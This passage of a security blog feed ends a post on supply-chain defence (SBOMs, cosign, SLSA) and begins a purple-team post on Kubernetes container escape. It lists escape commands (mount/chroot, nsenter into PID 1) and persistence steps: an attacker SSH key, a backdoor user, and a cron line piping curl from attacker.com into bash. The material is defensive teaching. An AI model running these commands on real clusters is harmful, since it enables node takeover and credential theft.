                                                    ──&#x25b6; sign with HSM key
                                                    ──&#x25b6; publish signed artifact
</code></pre>
<p>In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.</p>
<h3 id="5-sbom-in-every-release-non-negotiable">5. SBOM in Every Release — Non-Negotiable</h3>
<p>If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.</p>
<pre><code class="" data-line=""># Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp=&quot;^https://github\.com/your-org/your-repo/&quot; \
  --certificate-oidc-issuer=&quot;https://token.actions.githubusercontent.com&quot; \
  ghcr.io/your-org/your-image:latest | \
  jq -r &#039;.payload | @base64d | fromjson | .predicate.components[] | 
    select(.name == &quot;xz-libs&quot;) | {name, version}&#039;
</code></pre>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Hash pinning breaks automated dependency update workflows.</strong> When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.</p>
<p><strong>SLSA Level 3 requires hermetic builds — most teams are not ready.</strong> Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). Most existing CI pipelines fetch dependencies during the build step. Reaching SLSA Level 3 requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 as a 6-month target.</p>
<p><strong>SBOMs without a query workflow are paperwork.</strong> Generating an SBOM with <code class="" data-line="">syft</code> and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.</p>
<p><strong>A fail-open admission webhook silently admits unsigned images.</strong> By default, if an image has no cosign signature, <code class="" data-line="">cosign verify</code> returns an error — which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.</p>
<p><strong>Tarball vs git diff requires automation.</strong> Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like <code class="" data-line="">diffoscope</code> can automate the comparison; integrating it into your package intake process is the structural fix.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Attack Vector</th>
<th>Detection Signal</th>
<th>Fix</th>
</tr>
</thead>
<tbody>
<tr>
<td>Build system compromise (SolarWinds)</td>
<td>Artifact hash drift; unexpected egress during build; tarball ≠ git diff</td>
<td>SLSA Level 3 hermetic builds; separate signing environment</td>
</tr>
<tr>
<td>Maintainer social engineering (XZ)</td>
<td>Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls</td>
<td>Reproducible builds; tarball verification in package intake</td>
</tr>
<tr>
<td>Dependency confusion</td>
<td>Package resolves from public registry instead of private</td>
<td>Private artifact registry with scoped package names</td>
</tr>
<tr>
<td>Typosquatting</td>
<td><code class="" data-line="">pip-audit</code> / <code class="" data-line="">npm audit signatures</code> findings</td>
<td>Private registry; automated dependency scanning in CI</td>
</tr>
<tr>
<td>Unsigned container image</td>
<td><code class="" data-line="">cosign verify</code> fails; no attestation in registry</td>
<td>Sigstore/cosign in CI; fail-closed admission webhook</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li><strong>Supply chain attacks bypass perimeter security entirely</strong> — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve</li>
<li>SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds&#8217; own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts</li>
<li>XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling — the discovery came shortly before the backdoor would have shipped in multiple stable Linux distribution releases</li>
<li>The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)</li>
<li>Start with what you can implement this week: <code class="" data-line="">pip-audit</code> or <code class="" data-line="">npm audit signatures</code> in CI, <code class="" data-line="">syft</code> SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>SolarWinds showed that attackers can own your build system and reach your customers&#8217; production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.</p>
<p>Get EP10 in your inbox when it publishes → <a href="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/#subscribe">subscribe at linuxcent.com</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="LinkedIn" rel="nofollow noopener" 
target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&amp;linkname=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fsupply-chain-attack-solarwinds-xz-utils%2F&#038;title=Supply%20Chain%20Attacks%3A%20From%20SolarWinds%20to%20XZ%20Utils%20%E2%80%94%20Detection%20and%20Defense" data-a2a-url="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/" data-a2a-title="Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense"></a></p><p>The post <a href="https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/">Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/supply-chain-attack-solarwinds-xz-utils/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1867</post-id>	</item>
		<item>
		<title>Kubernetes Container Escape: Attack Paths and eBPF Detection</title>
		<link>https://linuxcent.com/kubernetes-container-escape-attack-paths/</link>
					<comments>https://linuxcent.com/kubernetes-container-escape-attack-paths/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Fri, 26 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[Container Escape]]></category>
		<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Runtime Security]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1864</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">minutes</span></span>Kubernetes container escape via --privileged or runc CVEs: two commands from container to node root. Attack path anatomy, eBPF detection, and the structural fixes that close each path.</p>
<p>The post <a href="https://linuxcent.com/kubernetes-container-escape-attack-paths/">Kubernetes Container Escape: Attack Paths and eBPF Detection</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code block container: dark theme, horizontally scrollable. position:relative
   makes it the anchor for the absolutely-positioned copy button and language badge. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested in a pre resets it so the dark theme shows through. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language group, keyed on the data-lang attribute of the pre.
   These must stay after the base pre rule so they override its border colour. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right of the pre, invisible (opacity 0) until the pre is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* Highlight applied while the button carries the "copied" class. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: pinned top-left, non-interactive (pointer-events:none), shown on hover like the button. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Tables: full width, collapsed borders, shaded header row and zebra-striped even rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  /* Code-block enhancer: tags each pre element with its language, adds a language
     badge, and adds a "Copy" button. The window.__lcCodeEnhanced flag makes any
     later copy of this script on the same page a no-op. */
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  /* Text to copy for one pre element: the inner code element when there is one;
     otherwise the pre's own text with the injected badge/button stripped, so the
     button label "Copy" never ends up on the clipboard. */
  function snippetText(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return clone.textContent;
  }
  /* Decorate every pre element currently in the document. */
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      /* Language is read from a "language-xxx" class on the code element, if any. */
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';
        badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      /* Explicit type so the button never submits an enclosing form. */
      btn.type='button';
      btn.className='lc-copy-btn';
      btn.textContent='Copy';
      btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=snippetText(pre,code);
        /* Async Clipboard API needs a secure context; otherwise use the textarea fallback. */
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  /* Success feedback: show "Copied!" for two seconds, then restore the label. */
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  /* Failure feedback: show the failure label for two seconds, then restore the label. */
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  /* Fallback copy via an off-screen textarea and execCommand('copy').
     execCommand reports failure by returning false (not only by throwing), so the
     return value decides between ok() and fail(); the textarea is always removed. */
  function fb(text,btn){
    var copied=false;
    var ta=null;
    try{
      ta=document.createElement('textarea');
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{if(ta&&ta.parentNode){ta.parentNode.removeChild(ta);}}
    if(copied){ok(btn);}else{fail(btn);}
  }
  /* Run once the DOM is parsed, or immediately if it already is. */
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="https://linuxcent.com/what-is-purple-team-security/">What is purple team security</a> → <a href="https://linuxcent.com/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="https://linuxcent.com/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="https://linuxcent.com/broken-access-control-aws/">Broken access control in AWS</a> → <a href="https://linuxcent.com/mfa-fatigue-attack/">MFA fatigue attacks</a> → <a href="https://linuxcent.com/cicd-secrets-exposure/">CI/CD secrets exposure</a> → <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to cloud metadata</a> → <strong>Kubernetes Container Escape</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li><strong>Kubernetes container escape</strong> is OWASP A04 + A05: a container deployed with <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, or <code class="" data-line="">hostNetwork</code> is not meaningfully isolated from the host — two commands can produce a root shell on the node</li>
<li>The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. <code class="" data-line="">--privileged</code> removes those boundaries — the kernel sees no difference between the container and the host</li>
<li>Three primary escape paths: privileged container with host device access, <code class="" data-line="">hostPID</code> + <code class="" data-line="">nsenter</code>, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec</li>
<li>Detection requires kernel-level visibility: Falco fires on privileged container exec; Tetragon traces <code class="" data-line="">nsenter</code> and <code class="" data-line="">mount</code> syscalls at the point of the kernel hook, not a process name check that can be evaded</li>
<li>The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks <code class="" data-line="">--privileged</code>, <code class="" data-line="">hostPID</code>, <code class="" data-line="">hostNetwork</code>, and mounts before a pod ever schedules</li>
<li>Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A04 Insecure Design — <code class="" data-line="">--privileged</code> placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──&#x25b6; exploit ──&#x25b6; shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────&#x25b6;   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────&#x25b6;   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘
</code></pre>
<p><strong>Kubernetes container escape</strong> is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node&#8217;s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with <code class="" data-line="">--privileged</code>, you remove the boundary.</p>
<hr />
<h2 id="the-incident-privileged-just-for-debugging">The Incident: &#8211;privileged &#8220;Just for Debugging&#8221;</h2>
<p>A networking issue in staging. The developer can&#8217;t get the CNI tracing they need from inside the normal container. Someone adds <code class="" data-line="">privileged: true</code> to the container&#8217;s <code class="" data-line="">securityContext</code> in the pod spec (the Kubernetes equivalent of <code class="" data-line="">docker run --privileged</code>) to expose <code class="" data-line="">/sys/class/net</code> and the raw packet socket. The PR merges. The staging deployment works. The <code class="" data-line="">--privileged</code> flag stays in the manifest when staging gets promoted to production.</p>
<p>Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.</p>
<p>Inside the container, once a mount point exists, two commands:</p>
<pre><code class="" data-line="">mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
</code></pre>
<p>Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because <code class="" data-line="">--privileged</code> was set.</p>
<p>The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.</p>
<p>This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn&#8217;t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.</p>
<hr />
<h2 id="why-the-kernel-doesnt-know-about-kubernetes">Why the Kernel Doesn&#8217;t Know About Kubernetes</h2>
<p>Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.</p>
<p>Kernel isolation comes from:</p>
<pre><code class="" data-line="">Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, and other privileged syscalls (including those gated by CAP_SYS_ADMIN)

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor
</code></pre>
<p><code class="" data-line="">--privileged</code> removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with <code class="" data-line="">mount</code>, you can fix even the filesystem view.</p>
<hr />
<h2 id="red-phase-the-three-escape-paths">Red Phase: The Three Escape Paths</h2>
<h3 id="path-1-privileged-container">Path 1: &#8211;privileged Container</h3>
<p>A privileged container has <code class="" data-line="">CAP_SYS_ADMIN</code>, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, <code class="" data-line="">/dev/sda1</code> or equivalent contains the host root filesystem.</p>
<p><strong>Check if the current container is privileged:</strong></p>
<pre><code class="" data-line=""># CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o &#039;cap_sys_admin&#039;
# cap_sys_admin — present means privileged
</code></pre>
<p><strong>Full escape sequence:</strong></p>
<pre><code class="" data-line=""># Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep &#039; / &#039;
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo &quot;ssh-rsa AAAA...&quot; &gt;&gt; /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node&#039;s bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/
</code></pre>
<p><strong>What persistence looks like from node root:</strong></p>
<pre><code class="" data-line=""># Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo &quot;* * * * * root curl http://attacker.com/c2 | bash&quot; \
  &gt;&gt; /mnt/host/etc/cron.d/maintenance
</code></pre>
<h3 id="path-2-hostpid-hostnetwork-escape">Path 2: hostPID / hostNetwork Escape</h3>
<p><code class="" data-line="">hostPID: true</code> is a less obvious escape path than <code class="" data-line="">--privileged</code> but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host&#8217;s full namespace set.</p>
<p><strong>With hostPID enabled, nsenter produces a host root shell without mounting anything:</strong></p>
<pre><code class="" data-line=""># From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep &quot; / &quot;  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)
</code></pre>
<blockquote>
<p><strong>nsenter</strong> — a Linux utility that enters the namespaces of an existing process. With <code class="" data-line="">-t 1</code> it enters PID 1&#8217;s namespaces, which are the host&#8217;s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.</p>
</blockquote>
<p><code class="" data-line="">hostNetwork: true</code> on its own does not directly produce a root shell, but it exposes the node&#8217;s network interfaces and allows binding to host ports. Combined with access to the cloud provider&#8217;s instance metadata service (IMDS), it enables credential theft from the node&#8217;s IAM role — the attack path covered in <a href="https://linuxcent.com/ssrf-cloud-metadata-imds-capital-one/">SSRF to cloud metadata and IMDSv1 exploitation</a>.</p>
<h3 id="path-3-runc-cve-escape-cve-2019-5736">Path 3: runc CVE Escape (CVE-2019-5736)</h3>
<p>CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.</p>
<p>The mechanism:</p>
<pre><code class="" data-line="">1. Attacker controls a container image
2. A binary the operator will exec (e.g. /bin/bash) is replaced in the image with a pointer to /proc/self/exe (a &quot;#!/proc/self/exe&quot; script or a symlink)
3. Operator runs: kubectl exec -it &lt;pod&gt; -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker&#039;s process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host
</code></pre>
<p>The detection signature for runc-class escapes is writes to <code class="" data-line="">/proc/self/exe</code> or writes to paths that correspond to runc&#8217;s host binary location from within a container process:</p>
<pre><code class="" data-line=""># Simplified bpftrace sketch for spotting /proc/self/exe writes (read-only tracing, safe to run):
# This shows the pattern — Tetragon implements this as a continuous policy

bpftrace -e &#039;
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf(&quot;PID %d comm %s writing fd %d\n&quot;, pid, comm, args-&gt;fd);
}
&#039; 2&gt;/dev/null | head -20
</code></pre>
<p>Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: <strong>node patching is the only fix for runc-class CVEs</strong> — pod security policy cannot prevent a vulnerability in the container runtime itself.</p>
<h3 id="safe-simulation-audit-your-cluster-before-an-attacker-does">Safe Simulation: Audit Your Cluster Before an Attacker Does</h3>
<p>These commands are read-only and safe to run against any cluster you have kubectl access to:</p>
<pre><code class="" data-line=""># Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(&quot; / &quot;)&#039; | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     (if .spec.hostPID then &quot;hostPID&quot; else &quot;&quot; end),
     (if .spec.hostNetwork then &quot;hostNetwork&quot; else &quot;&quot; end)] |
    join(&quot; / &quot;)&#039; | \
  grep -v &quot;/$&quot; | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + &quot;→&quot; + .hostPath.path)] |
    join(&quot; / &quot;)&#039; | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r &#039;.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join(&quot;/&quot;)&#039; | \
  sort -u
</code></pre>
<hr />
<h2 id="blue-phase-ebpf-detection">Blue Phase: eBPF Detection</h2>
